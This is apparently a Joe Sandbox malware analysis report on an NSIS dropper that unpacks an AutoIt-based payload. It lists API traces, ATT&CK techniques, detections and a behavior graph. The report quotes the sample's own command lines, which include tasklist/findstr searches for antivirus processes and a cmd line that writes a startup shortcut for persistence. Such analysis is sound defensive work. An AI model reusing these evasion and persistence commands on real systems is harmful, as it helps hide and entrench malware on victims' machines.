Source: C:\Users\user\AppData\Local\Temp\585723\Designing.pifCode function: 10_2_00B533B7 EncodePointer,__initp_misc_winsig,GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,10_2_00B533B7
Source: C:\Users\user\Desktop\C3KzPHU3UG.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\C3KzPHU3UG.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\C3KzPHU3UG.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\C3KzPHU3UG.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\C3KzPHU3UG.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\C3KzPHU3UG.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\C3KzPHU3UG.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\C3KzPHU3UG.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\C3KzPHU3UG.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\C3KzPHU3UG.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\C3KzPHU3UG.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\C3KzPHU3UG.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\tasklist.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\tasklist.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\585723\Designing.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\585723\Designing.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\585723\Designing.pifProcess information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\SyncTech Innovations\EchoSync.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\SyncTech Innovations\EchoSync.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\SyncTech Innovations\EchoSync.pifProcess information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-TimerJump to behavior
Source: C:\Users\user\AppData\Local\Temp\585723\Designing.pifAPI coverage: 4.7 %
Source: C:\Users\user\AppData\Local\SyncTech Innovations\EchoSync.pifAPI coverage: 4.5 %
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Users\user\Desktop\C3KzPHU3UG.exeCode function: 0_2_00405B98 FindFirstFileW,FindClose,0_2_00405B98
Source: C:\Users\user\Desktop\C3KzPHU3UG.exeCode function: 0_2_00406559 DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW,0_2_00406559
Source: C:\Users\user\Desktop\C3KzPHU3UG.exeCode function: 0_2_004029F1 FindFirstFileW,0_2_004029F1
Source: C:\Users\user\AppData\Local\Temp\585723\Designing.pifCode function: 10_2_00B94005 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,10_2_00B94005
Source: C:\Users\user\AppData\Local\Temp\585723\Designing.pifCode function: 10_2_00B9494A GetFileAttributesW,FindFirstFileW,FindClose,10_2_00B9494A
Source: C:\Users\user\AppData\Local\Temp\585723\Designing.pifCode function: 10_2_00B93CE2 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,10_2_00B93CE2
Source: C:\Users\user\AppData\Local\Temp\585723\Designing.pifCode function: 10_2_00B9C2FF FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,10_2_00B9C2FF
Source: C:\Users\user\AppData\Local\Temp\585723\Designing.pifCode function: 10_2_00B9CD9F FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,10_2_00B9CD9F
Source: C:\Users\user\AppData\Local\Temp\585723\Designing.pifCode function: 10_2_00B9CD14 FindFirstFileW,FindClose,10_2_00B9CD14
Source: C:\Users\user\AppData\Local\Temp\585723\Designing.pifCode function: 10_2_00B9F5D8 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,10_2_00B9F5D8
Source: C:\Users\user\AppData\Local\Temp\585723\Designing.pifCode function: 10_2_00B9F735 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,10_2_00B9F735
Source: C:\Users\user\AppData\Local\Temp\585723\Designing.pifCode function: 10_2_00B9FA36 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,10_2_00B9FA36
Source: C:\Users\user\AppData\Local\SyncTech Innovations\EchoSync.pifCode function: 15_2_006F4005 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,15_2_006F4005
Source: C:\Users\user\AppData\Local\SyncTech Innovations\EchoSync.pifCode function: 15_2_006F494A GetFileAttributesW,FindFirstFileW,FindClose,15_2_006F494A
Source: C:\Users\user\AppData\Local\SyncTech Innovations\EchoSync.pifCode function: 15_2_006FC2FF FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,15_2_006FC2FF
Source: C:\Users\user\AppData\Local\SyncTech Innovations\EchoSync.pifCode function: 15_2_006FCD14 FindFirstFileW,FindClose,15_2_006FCD14
Source: C:\Users\user\AppData\Local\SyncTech Innovations\EchoSync.pifCode function: 15_2_006FCD9F FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,15_2_006FCD9F
Source: C:\Users\user\AppData\Local\SyncTech Innovations\EchoSync.pifCode function: 15_2_006FF5D8 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,15_2_006FF5D8
Source: C:\Users\user\AppData\Local\SyncTech Innovations\EchoSync.pifCode function: 15_2_006FF735 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,15_2_006FF735
Source: C:\Users\user\AppData\Local\SyncTech Innovations\EchoSync.pifCode function: 15_2_006FFA36 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,15_2_006FFA36
Source: C:\Users\user\AppData\Local\SyncTech Innovations\EchoSync.pifCode function: 15_2_006F3CE2 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,15_2_006F3CE2
Source: C:\Users\user\AppData\Local\Temp\585723\Designing.pifCode function: 10_2_00B45D13 GetVersionExW,GetCurrentProcess,IsWow64Process,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,10_2_00B45D13
Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\Temp\585723\Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\Temp\585723Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\Temp\Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\Jump to behavior
Source: Designing.pif, 0000000A.00000002.2897348002.0000000003D9E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll;
Source: EchoSync.pif, 0000000F.00000002.2897348540.0000000003339000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllHI
Source: C:\Users\user\AppData\Local\Temp\585723\Designing.pifProcess information queried: ProcessInformationJump to behavior
Source: C:\Users\user\AppData\Local\Temp\585723\Designing.pifCode function: 10_2_00BA45D5 BlockInput,10_2_00BA45D5
Source: C:\Users\user\AppData\Local\Temp\585723\Designing.pifCode function: 10_2_00B45240 GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,10_2_00B45240
Source: C:\Users\user\AppData\Local\Temp\585723\Designing.pifCode function: 10_2_00B65CAC EncodePointer,EncodePointer,___crtIsPackagedApp,LoadLibraryExW,GetLastError,LoadLibraryExW,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,IsDebuggerPresent,OutputDebugStringW,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,10_2_00B65CAC
Source: C:\Users\user\Desktop\C3KzPHU3UG.exeCode function: 0_2_00405BBF GetModuleHandleA,LoadLibraryA,GetProcAddress,0_2_00405BBF
Source: C:\Users\user\AppData\Local\Temp\585723\Designing.pifCode function: 10_2_00B888CD GetSecurityDescriptorDacl,_memset,GetAclInformation,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,10_2_00B888CD
Source: C:\Windows\SysWOW64\tasklist.exeProcess token adjusted: DebugJump to behavior
Source: C:\Windows\SysWOW64\tasklist.exeProcess token adjusted: DebugJump to behavior
Source: C:\Users\user\AppData\Local\Temp\585723\Designing.pifCode function: 10_2_00B5A385 SetUnhandledExceptionFilter,UnhandledExceptionFilter,10_2_00B5A385
Source: C:\Users\user\AppData\Local\Temp\585723\Designing.pifCode function: 10_2_00B5A354 SetUnhandledExceptionFilter,10_2_00B5A354
Source: C:\Users\user\AppData\Local\SyncTech Innovations\EchoSync.pifCode function: 15_2_006BA354 SetUnhandledExceptionFilter,15_2_006BA354
Source: C:\Users\user\AppData\Local\SyncTech Innovations\EchoSync.pifCode function: 15_2_006BA385 SetUnhandledExceptionFilter,UnhandledExceptionFilter,15_2_006BA385
Source: C:\Users\user\AppData\Local\Temp\585723\Designing.pifCode function: 10_2_00B89369 LogonUserW,10_2_00B89369
Source: C:\Users\user\AppData\Local\Temp\585723\Designing.pifCode function: 10_2_00B45240 GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,10_2_00B45240
Source: C:\Users\user\AppData\Local\Temp\585723\Designing.pifCode function: 10_2_00B91AC6 SendInput,keybd_event,10_2_00B91AC6
Source: C:\Users\user\AppData\Local\Temp\585723\Designing.pifCode function: 10_2_00B951E2 mouse_event,10_2_00B951E2
Source: C:\Users\user\Desktop\C3KzPHU3UG.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k move Sexuality Sexuality.cmd & Sexuality.cmd & exitJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklistJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /I "wrsa.exe opssvc.exe" Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklistJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /I "avastui.exe avgui.exe bdservicehost.exe ekrn.exe nswscsvc.exe sophoshealth.exe" Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c md 585723Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /V "TranscriptHousesConstitutesMedicaid" Hate Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b ..\Rod + ..\Keep + ..\Prep + ..\Tsunami + ..\Invitations FJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\585723\Designing.pif Designing.pif FJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\choice.exe choice /d y /t 5Jump to behavior
Source: C:\Windows\System32\wscript.exeProcess created: C:\Users\user\AppData\Local\SyncTech Innovations\EchoSync.pif "C:\Users\user\AppData\Local\SyncTech Innovations\EchoSync.pif" "C:\Users\user\AppData\Local\SyncTech Innovations\p"Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\585723\Designing.pifProcess created: C:\Windows\SysWOW64\cmd.exe cmd /k echo [internetshortcut] > "c:\users\user\appdata\roaming\microsoft\windows\start menu\programs\startup\echosync.url" & echo url="c:\users\user\appdata\local\synctech innovations\echosync.js" >> "c:\users\user\appdata\roaming\microsoft\windows\start menu\programs\startup\echosync.url" & exit
Source: C:\Users\user\AppData\Local\Temp\585723\Designing.pifProcess created: C:\Windows\SysWOW64\cmd.exe cmd /k echo [internetshortcut] > "c:\users\user\appdata\roaming\microsoft\windows\start menu\programs\startup\echosync.url" & echo url="c:\users\user\appdata\local\synctech innovations\echosync.js" >> "c:\users\user\appdata\roaming\microsoft\windows\start menu\programs\startup\echosync.url" & exitJump to behavior
Source: C:\Users\user\AppData\Local\Temp\585723\Designing.pifCode function: 10_2_00B888CD GetSecurityDescriptorDacl,_memset,GetAclInformation,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,10_2_00B888CD
Source: C:\Users\user\AppData\Local\Temp\585723\Designing.pifCode function: 10_2_00B94F1C AllocateAndInitializeSid,CheckTokenMembership,FreeSid,10_2_00B94F1C
Source: Designing.pif, 0000000A.00000003.1692590846.0000000004653000.00000004.00000800.00020000.00000000.sdmp, Designing.pif, 0000000A.00000000.1685656569.0000000000BE6000.00000002.00000001.01000000.00000005.sdmp, EchoSync.pif, 0000000F.00000000.1790935077.0000000000746000.00000002.00000001.01000000.00000008.sdmpBinary or memory string: Run Script:AutoIt script files (*.au3, *.a3x)*.au3;*.a3xAll files (*.*)*.*au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
Source: Designing.pif, EchoSync.pifBinary or memory string: Shell_TrayWnd
Source: C:\Users\user\AppData\Local\Temp\585723\Designing.pifCode function: 10_2_00B5885B cpuid 10_2_00B5885B
Source: C:\Users\user\AppData\Local\Temp\585723\Designing.pifCode function: 10_2_00B70030 GetLocalTime,__swprintf,10_2_00B70030
Source: C:\Users\user\AppData\Local\Temp\585723\Designing.pifCode function: 10_2_00B70722 GetUserNameW,10_2_00B70722
Source: C:\Users\user\AppData\Local\Temp\585723\Designing.pifCode function: 10_2_00B6416A __lock,____lc_codepage_func,__getenv_helper_nolock,_free,_strlen,__malloc_crt,_strlen,__invoke_watson,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,10_2_00B6416A
Source: C:\Users\user\Desktop\C3KzPHU3UG.exeCode function: 0_2_00405C70 GlobalAlloc,lstrlenW,GetVersionExW,GetProcAddress,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,FreeLibrary,GlobalFree,lstrcpyW,OpenProcess,CloseHandle,CharUpperW,lstrcmpW,GlobalFree,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,FreeLibrary,lstrcmpW,CloseHandle,CloseHandle,FreeLibrary,CloseHandle,FreeLibrary,CloseHandle,0_2_00405C70
Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
Source: EchoSync.pifBinary or memory string: WIN_81
Source: EchoSync.pifBinary or memory string: WIN_XP
Source: EchoSync.pifBinary or memory string: WIN_XPe
Source: EchoSync.pifBinary or memory string: WIN_VISTA
Source: EchoSync.pifBinary or memory string: WIN_7
Source: EchoSync.pifBinary or memory string: WIN_8
Source: Statute.0.drBinary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_10WIN_2016WIN_81WIN_2012R2WIN_2012WIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPInstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\Appearance3, 3, 14, 5USERPROFILEUSERDOMAINUSERDNSDOMAINGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubyte
Source: C:\Users\user\AppData\Local\Temp\585723\Designing.pifCode function: 10_2_00BA696E socket,WSAGetLastError,bind,listen,WSAGetLastError,closesocket,10_2_00BA696E
Source: C:\Users\user\AppData\Local\Temp\585723\Designing.pifCode function: 10_2_00BA6E32 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,10_2_00BA6E32
Source: C:\Users\user\AppData\Local\SyncTech Innovations\EchoSync.pifCode function: 15_2_0070696E socket,WSAGetLastError,bind,listen,WSAGetLastError,closesocket,15_2_0070696E
Source: C:\Users\user\AppData\Local\SyncTech Innovations\EchoSync.pifCode function: 15_2_00706E32 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,15_2_00706E32

Mitre Att&ck Matrix

ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
Gather Victim Identity Information1
Scripting		2
Valid Accounts		1
Windows Management Instrumentation		1
Scripting		1
Exploitation for Privilege Escalation		1
Disable or Modify Tools		21
Input Capture		2
System Time Discovery		Remote Services1
Archive Collected Data		1
Ingress Tool Transfer		Exfiltration Over Other Network Medium1
System Shutdown/Reboot
CredentialsDomainsDefault Accounts1
Native API		1
DLL Side-Loading		1
DLL Side-Loading		1
Deobfuscate/Decode Files or Information		LSASS Memory1
Account Discovery		Remote Desktop Protocol21
Input Capture		1
Encrypted Channel		Exfiltration Over BluetoothNetwork Denial of Service
Email AddressesDNS ServerDomain Accounts1
Command and Scripting Interpreter		2
Valid Accounts		2
Valid Accounts		2
Obfuscated Files or Information		Security Account Manager3
File and Directory Discovery		SMB/Windows Admin Shares3
Clipboard Data		1
Non-Application Layer Protocol		Automated ExfiltrationData Encrypted for Impact
Employee NamesVirtual Private ServerLocal AccountsCron2
Registry Run Keys / Startup Folder		21
Access Token Manipulation		1
DLL Side-Loading		NTDS17
System Information Discovery		Distributed Component Object ModelInput Capture1
Application Layer Protocol		Traffic DuplicationData Destruction
Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon Script12
Process Injection		11
Masquerading		LSA Secrets31
Security Software Discovery		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC Scripts2
Registry Run Keys / Startup Folder		2
Valid Accounts		Cached Domain Credentials4
Process Discovery		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items21
Access Token Manipulation		DCSync1
Application Window Discovery		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job12
Process Injection		Proc Filesystem1
System Owner/User Discovery		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement

Behavior Graph

Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1502253 Sample: C3KzPHU3UG.exe Startdate: 31/08/2024 Architecture: WINDOWS Score: 80 44 XfYprRGwPXpYAiIF.XfYprRGwPXpYAiIF 2->44 48 Multi AV Scanner detection for submitted file 2->48 50 Sigma detected: Search for Antivirus process 2->50 52 Sigma detected: Drops script at startup location 2->52 54 2 other signatures 2->54 10 C3KzPHU3UG.exe 16 2->10         started        12 wscript.exe 1 2->12         started        signatures3 process4 signatures5 15 cmd.exe 2 10->15         started        58 Windows Scripting host queries suspicious COM object (likely to drop second stage) 12->58 19 EchoSync.pif 12->19         started        process6 file7 40 C:\Users\user\AppData\Local\...\Designing.pif, PE32 15->40 dropped 46 Drops PE files with a suspicious file extension 15->46 21 Designing.pif 4 15->21         started        25 cmd.exe 2 15->25         started        27 conhost.exe 15->27         started        29 7 other processes 15->29 signatures8 process9 file10 36 C:\Users\user\AppData\Local\...choSync.pif, PE32 21->36 dropped 38 C:\Users\user\AppData\Local\...choSync.js, ASCII 21->38 dropped 56 Drops PE files with a suspicious file extension 21->56 31 cmd.exe 2 21->31         started        signatures11 process12 file13 42 C:\Users\user\AppData\...choSync.url, MS 31->42 dropped 34 conhost.exe 31->34         started        process14

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


windows-stand

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

SourceDetectionScannerLabelLink
C3KzPHU3UG.exe33%ReversingLabsWin32.Trojan.Sonbokli
C3KzPHU3UG.exe36%VirustotalBrowse

Dropped Files

SourceDetectionScannerLabelLink
C:\Users\user\AppData\Local\SyncTech Innovations\EchoSync.pif0%ReversingLabs
C:\Users\user\AppData\Local\SyncTech Innovations\EchoSync.pif4%VirustotalBrowse
C:\Users\user\AppData\Local\Temp\585723\Designing.pif0%ReversingLabs
C:\Users\user\AppData\Local\Temp\585723\Designing.pif4%VirustotalBrowse

Unpacked PE Files

No Antivirus matches

Domains

No Antivirus matches

URLs

SourceDetectionScannerLabelLink
http://nsis.sf.net/NSIS_ErrorError0%URL Reputationsafe
http://nsis.sf.net/NSIS_ErrorError0%URL Reputationsafe
http://www.autoitscript.com/autoit3/J0%Avira URL Cloudsafe
https://www.autoitscript.com/autoit3/0%Avira URL Cloudsafe
http://www.autoitscript.com/autoit3/J0%VirustotalBrowse
https://www.autoitscript.com/autoit3/0%VirustotalBrowse

Domains and IPs

Contacted Domains

NameIPActiveMaliciousAntivirus DetectionReputation
XfYprRGwPXpYAiIF.XfYprRGwPXpYAiIF
unknown
unknownfalse
    		unknown

    URLs from Memory and Binaries

    NameSourceMaliciousAntivirus DetectionReputation
    http://www.autoitscript.com/autoit3/JC3KzPHU3UG.exe, 00000000.00000002.1653332037.000000000041E000.00000004.00000001.01000000.00000003.sdmp, Designing.pif, 0000000A.00000003.1692425832.0000000004577000.00000004.00000800.00020000.00000000.sdmp, Designing.pif, 0000000A.00000000.1685729671.0000000000BF9000.00000002.00000001.01000000.00000005.sdmp, EchoSync.pif, 0000000F.00000002.2896500055.0000000000759000.00000002.00000001.01000000.00000008.sdmp, Designing.pif.1.dr, EchoSync.pif.10.dr, Statute.0.drfalse
    • 0%, Virustotal, Browse
    • Avira URL Cloud: safe
    		unknown
    http://nsis.sf.net/NSIS_ErrorErrorC3KzPHU3UG.exefalse
    • URL Reputation: safe
    • URL Reputation: safe
    		unknown
    https://www.autoitscript.com/autoit3/Designing.pif, 0000000A.00000002.2897348002.0000000003D50000.00000004.00000020.00020000.00000000.sdmp, Designing.pif, 0000000A.00000003.1692425832.0000000004577000.00000004.00000800.00020000.00000000.sdmp, Designing.pif.1.dr, EchoSync.pif.10.dr, Statute.0.drfalse
    • 0%, Virustotal, Browse
    • Avira URL Cloud: safe
    		unknown

    World Map of Contacted IPs

    No contacted IP infos

    General Information

    Joe Sandbox version:40.0.0 Tourmaline
    Analysis ID:1502253
    Start date and time:2024-08-31 20:26:05 +02:00
    Joe Sandbox product:CloudBasic
    Overall analysis duration:0h 6m 16s
    Hypervisor based Inspection enabled:false
    Report type:full
    Cookbook file name:default.jbs
    Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
    Number of analysed new started processes analysed:21
    Number of new started drivers analysed:0
    Number of existing processes analysed:0
    Number of existing drivers analysed:0
    Number of injected processes analysed:0
    Technologies:
    • HCA enabled
    • EGA enabled
    • AMSI enabled
    Analysis Mode:default
    Analysis stop reason:Timeout
    Sample name:C3KzPHU3UG.exe
    renamed because original name is a hash value
    Original Sample Name:b1202e7766f87458e7bbee5a2b2103ca.exe
    Detection:MAL
    Classification:mal80.expl.evad.winEXE@28/15@2/0
    EGA Information:
    • Successful, ratio: 100%
    HCA Information:
    • Successful, ratio: 100%
    • Number of executed functions: 87
    • Number of non-executed functions: 310
    Cookbook Comments:
    • Found application associated with file extension: .exe

    Warnings

    • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
    • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
    • Not all processes where analyzed, report is missing behavior information
    • Report size exceeded maximum capacity and may have missing behavior information.
    • Report size exceeded maximum capacity and may have missing disassembly code.
    • Report size getting too big, too many NtOpenKeyEx calls found.
    • Report size getting too big, too many NtQueryValueKey calls found.
    • Report size getting too big, too many NtSetInformationFile calls found.

    Simulations

    Behavior and APIs

    TimeTypeDescription
    14:26:54API Interceptor1x Sleep call for process: C3KzPHU3UG.exe modified
    14:26:58API Interceptor3577x Sleep call for process: Designing.pif modified
    14:27:11API Interceptor2868x Sleep call for process: EchoSync.pif modified
    19:26:59AutostartRun: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\EchoSync.url

    Joe Sandbox View / Context

    IPs

    No context

    Domains

    No context

    ASNs

    No context

    JA3 Fingerprints

    No context

    Dropped Files

    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
    C:\Users\user\AppData\Local\SyncTech Innovations\EchoSync.pifCMmZKp0581.exeGet hashmaliciousRedLineBrowse
      X6vWBAXOKt.exeGet hashmaliciousRHADAMANTHYSBrowse
        D6irmhLxUJ.exeGet hashmaliciousRHADAMANTHYSBrowse
          oOpsx2SCjE.exeGet hashmaliciousRHADAMANTHYSBrowse
            X6vWBAXOKt.exeGet hashmaliciousRHADAMANTHYSBrowse
              5qckfVuvzX.exeGet hashmaliciousRHADAMANTHYSBrowse
                D6irmhLxUJ.exeGet hashmaliciousRHADAMANTHYSBrowse
                  oOpsx2SCjE.exeGet hashmaliciousRHADAMANTHYSBrowse
                    Setup.exeGet hashmaliciousUnknownBrowse
                      Setup.exeGet hashmaliciousUnknownBrowse
                        C:\Users\user\AppData\Local\Temp\585723\Designing.pifCMmZKp0581.exeGet hashmaliciousRedLineBrowse
                          X6vWBAXOKt.exeGet hashmaliciousRHADAMANTHYSBrowse
                            D6irmhLxUJ.exeGet hashmaliciousRHADAMANTHYSBrowse
                              oOpsx2SCjE.exeGet hashmaliciousRHADAMANTHYSBrowse
                                X6vWBAXOKt.exeGet hashmaliciousRHADAMANTHYSBrowse
                                  5qckfVuvzX.exeGet hashmaliciousRHADAMANTHYSBrowse
